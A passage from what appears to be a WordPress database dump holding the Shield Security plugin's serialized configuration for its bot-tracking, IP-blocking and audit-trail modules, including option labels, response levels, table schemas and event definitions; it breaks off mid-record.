Link.\";}s:12:\"track_xmlrpc\";a:12:{s:3:\"key\";s:12:\"track_xmlrpc\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:14:\"XML-RPC Access\";s:7:\"summary\";s:39:\"Identify A Bot When It Accesses XML-RPC\";s:11:\"description\";s:53:\"If you don\'t use XML-RPC, why would anyone access it?\";}s:19:\"track_invalidscript\";a:12:{s:3:\"key\";s:19:\"track_invalidscript\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:19:\"Invalid Script Load\";s:7:\"summary\";s:63:\"Identify A Bot Attempts To Load WordPress In A Non-Standard Way\";s:11:\"description\";s:60:\"WordPress should only be loaded in a limited number of ways.\";}s:17:\"track_loginfailed\";a:11:{s:3:\"key\";s:17:\"track_loginfailed\";s:7:\"section\";s:14:\"section_logins\";s:7:\"default\";s:20:\"transgression-single\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:122;s:4:\"name\";s:12:\"Failed Login\";s:7:\"summary\";s:47:\"Detect Failed Login Attempts By Valid Usernames\";s:11:\"description\";s:61:\"Penalise a visitor who fails to login using a valid username.\";}s:18:\"track_logininvalid\";a:12:{s:3:\"key\";s:18:\"track_logininvalid\";s:7:\"section\";s:14:\"section_logins\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:122;s:4:\"name\";s:17:\"Invalid Usernames\";s:7:\"summary\";s:30:\"Detect Invalid Username Logins\";s:11:\"description\";s:67:\"Identify A Bot When It Tries To Login With A Non-Existent Username.\";}s:20:\"track_fakewebcrawler\";a:12:{s:3:\"key\";s:20:\"track_fakewebcrawler\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f5\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:206;s:4:\"name\";s:16:\"Fake Web Crawler\";s:7:\"summary\";s:34:\"Detect Fake Search Engine Crawlers\";s:11:\"description\";s:89:\"Identify a Bot when it presents as an official web crawler, but analysis shows it\'s fake.\";}s:15:\"track_useragent\";a:12:{s:3:\"key\";s:15:\"track_useragent\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fi\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:124;s:4:\"name\";s:17:\"Empty User Agents\";s:7:\"summary\";s:38:\"Detect Requests With Empty User Agents\";s:11:\"description\";s:62:\"Identify a request as a bot if the user agent is not provided.\";}s:19:\"text_remainingtrans\";a:12:{s:3:\"key\";s:19:\"text_remainingtrans\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:139;s:4:\"name\";s:18:\"Remaining Offenses\";s:7:\"summary\";s:64:\"Visitor Triggers The IP Offenses System Through A Firewall Block\";s:11:\"description\";s:132:\"This message is displayed if the visitor triggered the IP Offenses system and reports how many offenses remain before being blocked.\";}s:15:\"autounblock_ips\";a:5:{s:3:\"key\";s:15:\"autounblock_ips\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:20:\"autounblock_emailids\";a:5:{s:3:\"key\";s:20:\"autounblock_emailids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:20:\"legacy_db_deleted_at\";a:5:{s:3:\"key\";s:20:\"legacy_db_deleted_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:0:\"\";}}s:11:\"definitions\";a:8:{s:18:\"allowable_ext_404s\";a:10:{i:0;s:2:\"js\";i:1;s:3:\"css\";i:2;s:3:\"gif\";i:3;s:3:\"jpg\";i:4;s:4:\"jpeg\";i:5;s:3:\"png\";i:6;s:3:\"map\";i:7;s:3:\"ttf\";i:8;s:4:\"woff\";i:9;s:5:\"woff2\";}s:18:\"db_handler_classes\";a:1:{s:9:\"botsignal\";s:77:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Modules\\IPs\\DB\\BotSignal\\Ops\\Handler\";}s:18:\"db_table_botsignal\";a:5:{s:10:\"autoexpire\";i:0;s:4:\"slug\";s:9:\"botsignal\";s:14:\"has_updated_at\";b:1;s:14:\"col_older_than\";s:10:\"updated_at\";s:11:\"cols_custom\";a:26:{s:6:\"ip_ref\";a:2:{s:10:\"macro_type\";s:14:\"foreign_key_id\";s:11:\"foreign_key\";a:1:{s:9:\"ref_table\";s:13:\"icwp_wpsf_ips\";}}s:9:\"notbot_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:6:\"NotBot\";}s:12:\"frontpage_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:24:\"Any Frontend Page Loaded\";}s:12:\"loginpage_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:17:\"Login Page Loaded\";}s:8:\"bt404_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:12:\"BotTrack 404\";}s:9:\"btfake_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:23:\"BotTrack FakeWebCrawler\";}s:11:\"btcheese_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:19:\"BotTrack LinkCheese\";}s:14:\"btloginfail_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:20:\"BotTrack LoginFailed\";}s:7:\"btua_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:23:\"BotTrack Useragent Fail\";}s:8:\"btxml_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:22:\"BotTrack XMLRPC Access\";}s:17:\"btlogininvalid_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:21:\"BotTrack LoginInvalid\";}s:18:\"btinvalidscript_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:22:\"BotTrack InvalidScript\";}s:11:\"cooldown_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:18:\"Cooldown Triggered\";}s:12:\"humanspam_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:28:\"Comment Marked As Human SPAM\";}s:11:\"markspam_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:20:\"Mark Comment As SPAM\";}s:13:\"unmarkspam_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:22:\"Unmark Comment As SPAM\";}s:14:\"captchapass_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:14:\"Captcha Passed\";}s:14:\"captchafail_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:14:\"Captcha Failed\";}s:7:\"auth_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:16:\"Successful Login\";}s:11:\"firewall_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:18:\"Triggered Firewall\";}s:12:\"ratelimit_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:19:\"Rate Limit Exceeded\";}s:10:\"offense_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:12:\"Last Offense\";}s:10:\"blocked_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:10:\"Last Block\";}s:12:\"unblocked_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:9:\"Unblocked\";}s:9:\"bypass_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:6:\"Bypass\";}s:9:\"snsent_at\";a:2:{s:10:\"macro_type\";s:9:\"timestamp\";s:7:\"comment\";s:17:\"Sent To ShieldNET\";}}}s:10:\"db_classes\";a:2:{s:10:\"botsignals\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\BotSignals\\Handler\";s:8:\"ip_lists\";s:62:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\IPs\\Handler\";}s:19:\"ip_lists_table_name\";s:8:\"ip_lists\";s:17:\"db_table_ip_lists\";a:3:{s:4:\"slug\";s:8:\"ip_lists\";s:11:\"cols_custom\";a:6:{s:2:\"ip\";s:76:\"varchar(60) NOT NULL DEFAULT \'\' COMMENT \'Human readable IP address or range\'\";s:5:\"label\";s:54:\"varchar(255) NOT NULL DEFAULT \'\' COMMENT \'Description\'\";s:4:\"list\";s:56:\"varchar(4) NOT NULL DEFAULT \'\' COMMENT \'Block or Bypass\'\";s:3:\"ip6\";s:56:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is IPv6\'\";s:8:\"is_range\";s:57:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is Range\'\";s:14:\"transgressions\";s:60:\"int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total Offenses\'\";}s:15:\"cols_timestamps\";a:2:{s:14:\"last_access_at\";s:17:\"Last Access By IP\";s:10:\"blocked_at\";s:10:\"IP Blocked\";}}s:19:\"db_table_botsignals\";a:6:{s:10:\"autoexpire\";i:3;s:4:\"slug\";s:10:\"botsignals\";s:14:\"col_older_than\";s:10:\"updated_at\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:1:{s:2:\"ip\";s:47:\"varbinary(16) DEFAULT NULL COMMENT \'IP Address\'\";}s:15:\"cols_timestamps\";a:25:{s:9:\"notbot_at\";s:6:\"NotBot\";s:12:\"frontpage_at\";s:24:\"Any Frontend Page Loaded\";s:12:\"loginpage_at\";s:17:\"Login Page Loaded\";s:8:\"bt404_at\";s:12:\"BotTrack 404\";s:9:\"btfake_at\";s:23:\"BotTrack FakeWebCrawler\";s:11:\"btcheese_at\";s:19:\"BotTrack LinkCheese\";s:14:\"btloginfail_at\";s:20:\"BotTrack LoginFailed\";s:7:\"btua_at\";s:23:\"BotTrack Useragent Fail\";s:8:\"btxml_at\";s:22:\"BotTrack XMLRPC Access\";s:17:\"btlogininvalid_at\";s:21:\"BotTrack LoginInvalid\";s:18:\"btinvalidscript_at\";s:22:\"BotTrack InvalidScript\";s:11:\"cooldown_at\";s:18:\"Triggered Cooldown\";s:12:\"humanspam_at\";s:28:\"Comment Marked As Human SPAM\";s:11:\"markspam_at\";s:20:\"Mark Comment As SPAM\";s:13:\"unmarkspam_at\";s:22:\"Unmark Comment As SPAM\";s:14:\"captchapass_at\";s:14:\"Captcha Passed\";s:14:\"captchafail_at\";s:14:\"Captcha Failed\";s:7:\"auth_at\";s:16:\"Successful Login\";s:11:\"firewall_at\";s:18:\"Triggered Firewall\";s:12:\"ratelimit_at\";s:19:\"Rate Limit Exceeded\";s:10:\"offense_at\";s:12:\"Last Offense\";s:10:\"blocked_at\";s:10:\"Last Block\";s:12:\"unblocked_at\";s:9:\"Unblocked\";s:9:\"bypass_at\";s:6:\"Bypass\";s:9:\"snsent_at\";s:17:\"Sent To ShieldNET\";}}s:6:\"events\";a:21:{s:14:\"custom_offense\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:7:\"message\";}s:7:\"offense\";b:1;}s:9:\"conn_kill\";a:2:{s:5:\"level\";s:7:\"warning\";s:15:\"audit_countable\";b:1;}s:22:\"conn_not_kill_high_rep\";a:1:{s:5:\"level\";s:5:\"debug\";}s:10:\"ip_offense\";a:2:{s:5:\"level\";s:7:\"warning\";s:12:\"audit_params\";a:2:{i:0;s:4:\"from\";i:1;s:2:\"to\";}}s:10:\"ip_blocked\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:4:\"from\";i:1;s:2:\"to\";}s:5:\"level\";s:5:\"alert\";}s:10:\"ip_unblock\";a:3:{s:5:\"level\";s:6:\"notice\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:13:\"ip_block_auto\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:2:\"ip\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:15:\"ip_block_manual\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:2:\"ip\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:13:\"ip_bypass_add\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:2:\"ip\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:16:\"ip_bypass_remove\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:2:\"ip\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:15:\"ip_unblock_flag\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:2:\"ip\";}s:5:\"level\";s:5:\"alert\";}s:15:\"bottrack_notbot\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:5:\"level\";s:5:\"debug\";}s:12:\"bottrack_404\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:4:\"path\";}s:7:\"offense\";b:1;}s:23:\"bottrack_fakewebcrawler\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:4:\"path\";i:1;s:7:\"crawler\";}s:7:\"offense\";b:1;}s:19:\"bottrack_linkcheese\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:4:\"path\";}s:7:\"offense\";b:1;}s:20:\"bottrack_loginfailed\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:1;}s:21:\"bottrack_logininvalid\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:1;}s:15:\"bottrack_xmlrpc\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:4:\"path\";}s:7:\"offense\";b:1;}s:22:\"bottrack_invalidscript\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:6:\"script\";}s:7:\"offense\";b:1;}s:16:\"comment_markspam\";a:2:{s:5:\"level\";s:6:\"notice\";s:7:\"offense\";b:1;}s:18:\"comment_unmarkspam\";a:3:{s:5:\"level\";s:4:\"info\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510338,'_site_transient_timeout_shield_mod_config_audit_trail','1632920474','no'),(510339,'_site_transient_shield_mod_config_audit_trail','a:9:{s:4:\"slug\";s:11:\"audit_trail\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"audit_trail\";s:4:\"name\";s:11:\"Audit Trail\";s:12:\"sidebar_name\";s:11:\"Audit Trail\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"audit_trail\";s:7:\"tagline\";s:50:\"Track All Site Activity: Who, What, When and Where\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:11:\"Audit Trail\";s:4:\"slug\";s:14:\"audit-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"audit-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:11:\"audit_trail\";}}}s:13:\"admin_notices\";a:1:{s:15:\"new-audit-trail\";a:6:{s:2:\"id\";s:15:\"new-audit-trail\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:4:\"info\";}}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:15:\"section_localdb\";s:7:\"primary\";b:1;s:5:\"title\";s:9:\"Log To DB\";s:11:\"title_short\";s:9:\"Log To DB\";s:9:\"beacon_id\";i:241;s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:5:{s:4:\"slug\";s:15:\"section_at_file\";s:5:\"title\";s:11:\"Log To File\";s:11:\"title_short\";s:11:\"Log To File\";s:9:\"beacon_id\";i:241;s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:5:{s:4:\"slug\";s:41:\"section_enable_plugin_feature_audit_trail\";s:5:\"title\";s:26:\"Enable Module: Audit Trail\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:241;s:7:\"summary\";a:2:{i:0;s:124:\"Purpose - The Audit Trail is designed so you can look back on events and analyse what happened and what may have gone wrong.\";i:1;s:56:\"Recommendation - Keep the Audit Trail feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:5:{s:18:\"enable_audit_trail\";a:11:{s:3:\"key\";s:18:\"enable_audit_trail\";s:7:\"section\";s:41:\"section_enable_plugin_feature_audit_trail\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5p\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:9:\"beacon_id\";i:241;s:4:\"name\";s:18:\"Enable Audit Trail\";s:7:\"summary\";s:42:\"Enable (or Disable) The Audit Trail module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Audit Trail module\";}s:12:\"log_level_db\";a:11:{s:3:\"key\";s:12:\"log_level_db\";s:7:\"section\";s:15:\"section_localdb\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:3:{i:0;s:5:\"alert\";i:1;s:7:\"warning\";i:2;s:6:\"notice\";}s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:16:\"Logging Disabled\";}i:1;a:2:{s:9:\"value_key\";s:5:\"alert\";s:4:\"text\";s:5:\"Alert\";}i:2;a:2:{s:9:\"value_key\";s:7:\"warning\";s:4:\"text\";s:7:\"Warning\";}i:3;a:2:{s:9:\"value_key\";s:6:\"notice\";s:4:\"text\";s:6:\"Notice\";}i:4;a:2:{s:9:\"value_key\";s:4:\"info\";s:4:\"text\";s:4:\"Info\";}i:5;a:2:{s:9:\"value_key\";s:5:\"debug\";s:4:\"text\";s:5:\"Debug\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:375;s:4:\"name\";s:13:\"Logging Level\";s:7:\"summary\";s:31:\"Logging Level For DB-Based Logs\";s:11:\"description\";s:31:\"Logging Level For DB-Based Logs\";}s:22:\"audit_trail_auto_clean\";a:11:{s:3:\"key\";s:22:\"audit_trail_auto_clean\";s:7:\"section\";s:15:\"section_localdb\";s:7:\"default\";i:7;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/a2\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:9:\"beacon_id\";i:375;s:4:\"name\";s:10:\"Auto Clean\";s:7:\"summary\";s:26:\"Enable Audit Auto Cleaning\";s:11:\"description\";s:94:\"Events older than the number of days specified will be automatically cleaned from the database\";}s:14:\"log_level_file\";a:12:{s:3:\"key\";s:14:\"log_level_file\";s:7:\"section\";s:15:\"section_at_file\";s:7:\"premium\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:8:\"disabled\";}s:13:\"value_options\";a:7:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:16:\"Logging Disabled\";}i:1;a:2:{s:9:\"value_key\";s:10:\"same_as_db\";s:4:\"text\";s:10:\"Same As DB\";}i:2;a:2:{s:9:\"value_key\";s:5:\"alert\";s:4:\"text\";s:5:\"Alert\";}i:3;a:2:{s:9:\"value_key\";s:7:\"warning\";s:4:\"text\";s:7:\"Warning\";}i:4;a:2:{s:9:\"value_key\";s:6:\"notice\";s:4:\"text\";s:6:\"Notice\";}i:5;a:2:{s:9:\"value_key\";s:4:\"info\";s:4:\"text\";s:4:\"Info\";}i:6;a:2:{s:9:\"value_key\";s:5:\"debug\";s:4:\"text\";s:5:\"Debug\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:375;s:4:\"name\";s:18:\"File Logging Level\";s:7:\"summary\";s:33:\"Logging Level For File-Based Logs\";s:11:\"description\";s:33:\"Logging Level For File-Based Logs\";}s:20:\"legacy_db_deleted_at\";a:5:{s:3:\"key\";s:20:\"legacy_db_deleted_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:0:\"\";}}s:11:\"definitions\";a:8:{s:18:\"db_handler_classes\";a:2:{s:7:\"at_logs\";s:79:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Modules\\AuditTrail\\DB\\Logs\\Ops\\Handler\";s:7:\"at_meta\";s:79:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Modules\\AuditTrail\\DB\\Meta\\Ops\\Handler\";}s:16:\"db_table_at_logs\";a:5:{s:4:\"slug\";s:7:\"at_logs\";s:14:\"has_updated_at\";b:1;s:14:\"has_created_at\";b:1;s:14:\"has_deleted_at\";b:0;s:11:\"cols_custom\";a:3:{s:7:\"req_ref\";a:2:{s:10:\"macro_type\";s:14:\"foreign_key_id\";s:11:\"foreign_key\";a:1:{s:9:\"ref_table\";s:18:\"icwp_wpsf_req_logs\";}}s:7:\"site_id\";a:3:{s:10:\"macro_type\";s:12:\"unsigned_int\";s:7:\"default\";i:1;s:7:\"comment\";s:7:\"Site ID\";}s:10:\"event_slug\";a:2:{s:10:\"macro_type\";s:7:\"varchar\";s:7:\"comment\";s:10:\"Event Slug\";}}}s:16:\"db_table_at_meta\";a:5:{s:4:\"slug\";s:7:\"at_meta\";s:14:\"has_updated_at\";b:0;s:14:\"has_created_at\";b:0;s:14:\"has_deleted_at\";b:0;s:11:\"cols_custom\";a:3:{s:7:\"log_ref\";a:3:{s:10:\"macro_type\";s:14:\"foreign_key_id\";s:11:\"foreign_key\";a:1:{s:9:\"ref_table\";s:17:\"icwp_wpsf_at_logs\";}s:7:\"comment\";s:30:\"Reference to primary log entry\";}s:8:\"meta_key\";a:3:{s:10:\"macro_type\";s:7:\"varchar\";s:6:\"length\";i:32;s:7:\"comment\";s:8:\"Meta Key\";}s:10:\"meta_value\";a:2:{s:10:\"macro_type\";s:4:\"text\";s:7:\"comment\";s:9:\"Meta Data\";}}}s:10:\"db_classes\";a:1:{s:11:\"audit_trail\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AuditTrail\\Handler\";}s:20:\"db_table_audit_trail\";a:3:{s:4:\"slug\";s:11:\"audit_trail\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:8:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:2:\"ip\";s:59:\"varchar(40) NOT NULL DEFAULT 0 COMMENT \'Visitor IP Address\'\";s:11:\"wp_username\";s:51:\"varchar(255) NOT NULL DEFAULT \'-\' COMMENT \'WP User\'\";s:7:\"context\";s:59:\"varchar(32) NOT NULL DEFAULT \'none\' COMMENT \'Audit Context\'\";s:5:\"event\";s:66:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Specific Audit Event\'\";s:8:\"category\";s:53:\"int(3) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Severity\'\";s:4:\"meta\";s:31:\"text COMMENT \'Audit Event Data\'\";s:5:\"count\";s:62:\"SMALLINT(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT \'Repeat 